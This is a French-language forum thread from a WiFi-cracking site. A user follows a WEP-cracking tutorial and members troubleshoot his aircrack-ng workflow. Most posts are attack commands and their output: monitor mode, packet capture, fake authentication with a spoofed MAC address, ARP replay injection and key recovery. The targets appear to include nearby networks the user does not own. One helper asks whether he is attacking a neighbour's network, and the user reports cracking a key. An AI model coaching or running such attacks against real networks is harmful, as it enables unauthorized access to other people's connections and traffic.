Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-05-2011 15:54:19

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

Bonjour,
Alors pour cracker une clef WEP je suis le tutoriel mais plein de choses ne collent pas.
La premiere, il est indique de passer en clavier Francais hors je dispose d'un clavier qwerty Canadien. donc si je le passe en Francais je vais plus savoir sur quelle touches appuyer.
Ensuite le chipset est inconu pour la carte reseau integre, par contre il est connu pour la clef USB WIFI mais si possible j'aimerais que sa fonctionne directement sans que j'ai a utiliser la clef USB WIFI.

Interface    Chipset        Driver

eth0        Unknown         wl
wlan0        Ralink 2573 USB    rt73usb - [phy3]
                (monitor mode enabled on mon1)
mon0        Ralink 2573 USB    rt73usb - [phy3]

Puis lorsque je lance la commande

airodump-ng --encrypt wep wlan0

Sa me fait

[email protected]:~$ sudo airodump-ng --encrypt wep wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.

Je lance donc la commande

airmon-ng start wlan0 <#>

mais je ne sais pas par quoi remplacer le #.
Voila j'ai pas reussi a aller bien loin pour l'instant^^
Merci pour votre aide

Dernière modification par drefhill (08-05-2011 15:57:08)


Kentoc'h mervel eget bezañ saotret

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-05-2011 16:34:43

BloodyMary
Membre Radioactif
Inscription : 11-08-2009
Messages : 92

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

Salut!

Le tutoriel que tu utilise est prévu pour une version antérieure de BT, je pars du principe que tu utilises BT4r2, dernière version.
Si tu regardes sur ta 1ère capture, le mode monitor est disponible sur l’interface "mon1". C'est cette dernière interface que tu dois utiliser pour la suite du crack pour clôturer tes lignes de commandes.

Concernant le clavier, il n'y aucune raison qui puisse te pousser à en changer le mappage, sauf si tu veux ajouter une difficulté supplémentaire! wink

Concernant la carte, il semble en effet qu'elle ne soit pas compatible pour l'injection... Mais si tu ne nous donne pas le modèle, ça va 'etre compliqué pour nous de te le confirmer... Sinon, tu peux faire un "airplay-ng -9 <interface>".

Hors Ligne

#3 08-05-2011 17:36:46

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

La carte c'est une Broadcom BCM432b integree dans mon HP mini 2140.

J'ai donc reussi a avancer un peu plus mais apres analyse de la connection sa affiche une puissance du signal de 0 alors qu'en reception ubuntu me donne le maximum de barres (normal j'suis a 5 metres^^)

CH 10 ][ Elapsed: 4 mins ][ 2011-05-08 18:26 ][ fixed channel mon0: -1                             
                                                                                                   
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                 
                                                                                                   
E0:91:53:3F:C0:DF  -63   0        1        0    0   1  54 . WEP  WEP         WLAN_5B               
                                                                                                   
BSSID              STATION            PWR   Rate    Lost  Packets  Probes

Et je ne trouve pas non plus ou sont enregistres les fichiers.


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#4 08-05-2011 17:51:16

BloodyMary
Membre Radioactif
Inscription : 11-08-2009
Messages : 92

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

Il va falloir que tu sois plus structuré et surtout plus précis. On pourra pas t'aider si tu nous balance que des captures en vrac. Ce qu'il nous faut, c'est tes commandes et leur retour. Tu as fait le airplay -9? Qu'est-ce que ça donne?

Ne te formalise pas trop sur le pwr, il y a souvent des bugs d'affichage avec airodump. Ce qui est important c'est le rxq, et ce que je peux voir sur ta capture, il est tout à fait correct pour un crack wep.

Hors Ligne

#5 08-05-2011 17:55:35

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

BloodyMary a écrit :

Tu as fait le airplay -9? Qu'est-ce que ça donne?

Sa n'a pas marche et je ne sais pas par quoi remplacer le <interface>

BloodyMary a écrit :

Ne te formalise pas trop sur le pwr, il y a souvent des bugs d'affichage avec airodump. Ce qui est important c'est le rxq, et ce que je peux voir sur ta capture, il est tout à fait correct pour un crack wep.

Justement c'est pas le power qui m'inquite c'est le rxq qui d'apres le tuto devrais etre proche de 100 hors moi il est a 0.


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#6 08-05-2011 17:57:27

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

Oulà, je sens qu'on va cumuler les problèmes ici...

Bon, première chose : ce n'est pas ton PWR qui est à 0 mais ton RXQ. Ce n'est pas bon signe non plus mais je penche pour le bug.
Deuxième chose, tu as le bug du "fixed channel -1", ce qui est assez surprenant si tu es sous BT4... Tu sais nous rappeler quel OS tu utilises exactement (avec la version) ?

Et dernière chose, je préfère te prévenir que les Broadcom sont notoirement connues pour être ch... pénibles à faire fonctionner en injection, donc pas sûr que tu arrives à faire tourner tout ça sans passer par ton adaptateur USB wink

En bref :
- quel OS utilises-tu ?
- donnes nous toutes les commandes que tu tapes ainsi que leurs retours (+1 BloodyMary)
- donnes-nous le résultat de [c]aireplay-ng -9 mon1[/c] (ou mon0, ça dépend de ce que tu as) (+1 BloodyMary)²
Avec ça on pourra sans doute t'en dire + mais je préfère te dire que c'est pas gagné tongue

@BloodyMary : tu me donnes soif avec ton pseudo, à l'heure de l'apéro en plus... big_smile

Hors Ligne

#7 08-05-2011 18:07:42

BloodyMary
Membre Radioactif
Inscription : 11-08-2009
Messages : 92

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

L'interface est ce qui est créé à la suite du airmon, le message est "monitor mode enabled on mon1"(cf ta première capture)

antares145 a écrit :

Bon, première chose : ce n'est pas ton PWR qui est à 0 mais ton RXQ. Ce n'est pas bon signe non plus mais je penche pour le bug.

+

drefhill a écrit :

Justement c'est pas le power qui m'inquite c'est le rxq qui d'apres le tuto devrais etre proche de 100 hors moi il est a 0.

Ah oui, autant pour moi! J'ai mal vu... smile

antares145 a écrit :

@BloodyMary : tu me donnes soif avec ton pseudo, à l'heure de l'apéro en plus... big_smile

tongue Santé! (oui, je suis un sadique)

Hors Ligne

#8 08-05-2011 18:09:29

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

je préfère te dire que c'est pas gagné tongue

A bon pourtant il parrait que le wep est simple a cracker, le WPA serais donc plus simple ?
J'ai ubuntu 11.04

[email protected]:~$ sudo aireplay-ng -9 mon0
19:05:53  Trying broadcast probe requests...
19:05:53  Injection is working!
19:05:55  Found 3 APs

19:05:55  Trying directed probe requests...
19:05:55  C0:3F:0E:C1:75:0F - channel: 11 - 'ONO750F'
19:05:59  Ping (min/avg/max): 3.406ms/143.289ms/184.948ms Power: -62.93
19:05:59  30/30: 100%

19:05:59  00:13:F7:DF:D9:A7 - channel: 11 - 'TERRY21'
19:06:01  Ping (min/avg/max): 37.256ms/78.709ms/113.464ms Power: -64.47
19:06:01  30/30: 100%

19:06:01  00:1A:2B:4A:40:60 - channel: 11 - 'JAZZTEL_53'
19:06:06  Ping (min/avg/max): 2.608ms/42.001ms/78.663ms Power: -84.27
19:06:06  11/30:  36%


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#9 08-05-2011 18:22:58

BloodyMary
Membre Radioactif
Inscription : 11-08-2009
Messages : 92

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

drefhill a écrit :

A bon pourtant il parrait que le wep est simple a cracker, le WPA serais donc plus simple ?

Le plus simple serait que tu te documente un minimum avant de nous poser des questions... wink
En effet, le wep est crackable "facilement", mais ce n'est pas une science exacte, d'une fois à l'autre, ça peut prendre plus ou moins de temps. Quant au wpa, ça c'est du solide. Si la clé est pas bonne, il faut une bonne dose de patience, un bon dictionnaire et surtout de la chance de cocu. Si la clé est bonne, la probabilité de la trouver est proche de 0.

19:05:53  Injection is working!

Ah, bah ça c'est bon signe.

Hors Ligne

#10 08-05-2011 19:03:32

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

[email protected]:~$ sudo aireplay-ng -1 0 -e WLAN_5B -a E0:91:53:3F:C0:DF -b E0:91:53:3F:C0:DF -h 00:26:B6:EF:E0:1D mon0
The interface MAC (00:27:19:F6:CD:91) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:26:B6:EF:E0:1D
19:54:25  Waiting for beacon frame (BSSID: E0:91:53:3F:C0:DF) on channel -1
19:54:25  mon0 is on channel -1, but the AP uses channel 1

et a par sa je ne sais toujours pas ou sont les fichiers out-01, la recherche ne donne rien.


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#11 08-05-2011 19:10:26

BloodyMary
Membre Radioactif
Inscription : 11-08-2009
Messages : 92

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

Est-ce que tu as bien spécifié le paramètre "-w out" à la commande

airodump-ng -w out -c 1 --bssid ... mon0

Le fichier devrait être nommé "out-01.cap" et devrait être placé sur le bureau. Mais je ne l'ai jamais fait depuis ubuntu, donc c'est possible que se soit différent.

Hors Ligne

#12 08-05-2011 19:54:36

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

En fait dans le tuto ils ont ecrit -c 10 et sa me fait le test sans la partie du bas mais la avec -c 1 sa marche mieu.

sudo airodump-ng -w out -c 1 --bssid E0:91:53:3F:C0:DF mon0
CH  1 ][ BAT: 3 hours 17 mins ][ Elapsed: 2 mins ][ 2011-05-08 20:30 ][ fixed channel mon0: -1 
                                                                                                 
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                                 
E0:91:53:3F:C0:DF  -63  81     1235      135    0   1  54 . WEP  WEP         WLAN_5B           
                                                                                                 
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                       
                                                                                                 
E0:91:53:3F:C0:DF  00:26:B6:EF:E0:1D  -75   54 - 1      6      204

mais ensuite j'ai toujours

[email protected]:~$ sudo aireplay-ng -1 0 -e WLAN_5B -a E0:91:53:3F:C0:DF -b E0:91:53:3F:C0:DF -h 00:26:B6:EF:E0:1D mon0
[sudo] password for drefhill:
The interface MAC (00:27:19:F6:CD:91) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:26:B6:EF:E0:1D
20:53:02  Waiting for beacon frame (BSSID: E0:91:53:3F:C0:DF) on channel -1
20:53:02  mon0 is on channel -1, but the AP uses channel 1


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#13 08-05-2011 19:55:20

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

Sous unbutu ils sont dans le root:

ls -l /root

N'oublies pas que a chaque fois que tu écris le meme nom en fichier .cap (dans ton cas out) sa deviens out-01.cap out-2.cap etc wink

Hors Ligne

#14 08-05-2011 20:10:29

BloodyMary
Membre Radioactif
Inscription : 11-08-2009
Messages : 92

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

drefhill a écrit :

En fait dans le tuto ils ont ecrit -c 10 et sa me fait le test sans la partie du bas mais la avec -c 1 sa marche mieu.

C'est normal, le paramètre -c est  le chanel sur lequel l'AP émet. Dans le tuto, c'est le 10. Dans ton cas c'est le 1, il faut regarder dans la colonne CH de airodump-ng. C'est pour fixer tous les paramètres variables de cas en cas (bssid, essid, chanel...) par rapport à un réseau wifi donné qu'on lance une recherche airodump sans paramètres au tout début.

Hors Ligne

#15 08-05-2011 22:16:07

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

C'est bien ce que je pensais, tu as le bug du channel -1, apparemment c'est toujours pas réglé sur Ubuntu roll

Tu peux jeter un œil ici pour voir comment résoudre le problème, mais ça dépasse peut-être tes compétences hmm
--> aireplay-ng

Sinon, en utilisant BT4 tu n'auras pas ce problème mais je pense que ta carte ne pourra pas injecter. Tu peux attendre encore quelques jours (2, si tout va bien) et faire un essai avec BT5 mais là je peux rien garantir big_smile

Hors Ligne

#16 03-07-2011 00:09:04

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

alors j'ai suivi le message precedent pour ''metre a jour aircrack ''
et voila ce que j'ai

[email protected]:~$ sudo aireplay-ng -1 0 -e JAZZTEL_53 -a 00:1A:2B:4A:40:60 -b 00:1A:2B:4A:40:60 -h 00:1F:3B:1A:50:FB mon0--ignore-negative-one
[sudo] password for drefhill:
Interface mon0--ignore-negative-one:
ioctl(SIOCGIFINDEX) failed: No such device
[email protected]:~$ sudo aireplay-ng -1 0 -e JAZZTEL_53 -a 00:1A:2B:4A:40:60 -b 00:1A:2B:4A:40:60 -h 00:1F:3B:1A:50:FB mon0
[sudo] password for drefhill:
The interface MAC (00:27:19:F6:CD:91) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:1F:3B:1A:50:FB
01:05:01  Waiting for beacon frame (BSSID: 00:1A:2B:4A:40:60) on channel -1
01:05:01  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#17 03-07-2011 10:07:14

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

T'as juste oublié l'espace entre mon0 et --ignore-negative-one roll

[email protected]:~$ sudo aireplay-ng -1 0 -e JAZZTEL_53 -a 00:1A:2B:4A:40:60 -h 00:1F:3B:1A:50:FB mon0 --ignore-negative-one

OK pour t'aider mais il y a une série de trucs que tu devrais pouvoir trouver toi-même... wink

Hors Ligne

#18 03-07-2011 13:50:09

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

je vois que tu as suprimer le -b et ce qui etait derriere hors je ne voit nulle part dans le tuto ce que signifie le -b et pourquoi il faut l'enlever.


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#19 03-07-2011 14:15:40

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

[email protected]:~$ sudo aireplay-ng -1 0 -e JAZZTEL_53 -a 00:1A:2B:4A:40:60 -h 00:1F:3B:1A:50:FB mon0 --ignore-negative-one
[sudo] password for drefhill:
The interface MAC (00:27:19:F6:CD:91) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:1F:3B:1A:50:FB
14:50:39  Waiting for beacon frame (BSSID: 00:1A:2B:4A:40:60) on channel -1

14:50:39  Sending Authentication Request (Open System) [ACK]
14:50:39  Authentication successful
14:50:39  Sending Association Request [ACK]
14:50:39  Association successful :-) (AID: 1)

[email protected]:~$ sudo aireplay-ng -3 -e JAZZTEL_53 -a 00:1A:2B:4A:40:60 -h 00:1F:3B:1A:50:FB -x 600 -r out-09.cap mon0 --ignore-negative-one
The interface MAC (00:27:19:F6:CD:91) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:1F:3B:1A:50:FB
15:00:10  Waiting for beacon frame (ESSID: JAZZTEL_53) on channel -1
Found BSSID "00:1A:2B:4A:40:60" to given ESSID "JAZZTEL_53".
Saving ARP requests in replay_arp-0703-150015.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?

"puis la ligne indiquant le nombre d' arp que je ne peut copier mais elle n'indique que 22 arp en 10 min"

Donc voila 22 ARP en 10 min alors s'il en faut minimum 40 000 j'y serais encore dans 2 mois

CH 11 ][ Elapsed: 25 mins ][ 2011-07-03 15:11 ][ fixed channel mon0: -1                       
                                                                                               
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID           
                                                                                               
00:1A:2B:4A:40:60  -77  91     8766      552    0  11  54   WEP  WEP    OPN  JAZZTEL_53       
                                                                                               
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                     
                                                                                               
00:1A:2B:4A:40:60  00:1F:3B:1A:50:FB    0    0 - 1   59579    84734


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#20 03-07-2011 14:38:12

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

Et qu'est ce que ça donne si tu lance l'injection immédiatement après l'association, et pas après avoir attendu 10 minutes entre les deux? Parce que là, tu as un message qui indique clairement que tu t'es fait ejecter de l'AP...

Hors Ligne

#21 03-07-2011 18:26:40

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

Ta commande de fakeauth (aireplay-ng -1 [...]) doit tourner pendant toute l'attaque, dans sa propre konsole ! Comme ça, même si tu te fais dégager par l'AP (comme c'est le cas ici visiblement) tu te réassocieras à intervalle régulier.
La commande doit donc te renvoyer régulièrement "association succesful", et ce jusqu'à la fin de l'attaque.

Hors Ligne

#22 03-07-2011 19:31:51

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

ok merci j'vais retenter ca.

C'est quoi l'AP ?  (application ?)


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#23 03-07-2011 19:45:08

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

AP = Access Point ou point d'accès.

Hors Ligne

#24 03-07-2011 21:04:41

drefhill
Banni(e)
Lieu : Madrid
Inscription : 08-05-2011
Messages : 14

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

sudo aireplay-ng -1 0 -e WLAN_5B -a E0:91:53:3F:C0:DF -h 00:1D:1A:01:2F:EB mon0 --ignore-negative-one

Sa se lance se connect puis s'arrete automatiquement je ne peux donc pas la laisser tourner comme elle s'arrete toute seule une fois connecte.

et si je relance la commande voila ce que sa m'affiche

[email protected]:~$ sudo aireplay-ng -1 0 -e WLAN_5B -a E0:91:53:3F:C0:DF -h 00:1D:1A:01:2F:EB mon0 --ignore-negative-one
The interface MAC (00:27:19:F6:CD:91) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:1D:1A:01:2F:EB
22:14:53  Waiting for beacon frame (BSSID: E0:91:53:3F:C0:DF) on channel -1

22:14:53  Sending Authentication Request (Open System) [ACK]

22:15:09  Sending Authentication Request (Open System) [ACK]

22:15:11  Sending Authentication Request (Open System) [ACK]

22:15:14  Sending Authentication Request (Open System) [ACK]
22:15:14  Got a deauthentication packet! (Waiting 3 seconds)

22:15:17  Sending Authentication Request (Open System) [ACK]

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

j'ai finalement reussi a avoir 90 000 ARP et 30 000 IVS mais sa me met toujours

Failed. Next try with 35 000 IVs.

faut laisser tout tourner jusqu'a ce que sa trouve ? sa peut aller jusqu'a combien avant de trouver ?  car dans le tuto c'est passe avec 40 000ARP et 15 000 IVS
Falait-il fermer aireplay-ng -3    avant de lancer aircrack ?

edit: j'ai finalement reussi a trouver la clef avec 35 000 IVS  et quelques heures de galere, mais pour les prochaines fois sa devrais aller plus vite.
Merci pour tout

Dernière modification par drefhill (03-07-2011 21:52:49)


Kentoc'h mervel eget bezañ saotret

Hors Ligne

#25 03-07-2011 21:31:00

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : suivi du tutoriel mais plein de chose ne vont pas comme c'est indique.

OK, adapte la commande comme ceci pour te réassocier toutes les 10 secondes :

sudo aireplay-ng -1 10 -e WLAN_5B -a E0:91:53:3F:C0:DF -h 00:1D:1A:01:2F:EB mon0 --ignore-negative-one

Tiens, tu as changé de cible ? Tu as 2 réseaux chez toi ou bien tu tentes ta chance sur le réseau du voisin (si c'est le cas tu vas te faire taper sur les doigts !) roll

Sinon, pour le nombre d'IV, je rappelle qu'on travaille ici avec des attaques statistiques, donc c'est une question de probabilités : je ne peux pas te garantir qu'avec 31337 IV captés un soir de pleine lune d'un mois impair, ça passera d'office ! Par expérience je dirais qu'avec 50.000 ça suffit généralement pour casser, mais ça dépend aussi si tu attaques en PTW ou en FMS (ici si je vois bien le tuto tu es en PTW donc c'est la plus rapide).

Un peu de patience, si avec 100.000 IV tu n'arrives toujours à rien alors il y a un problème wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.042 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]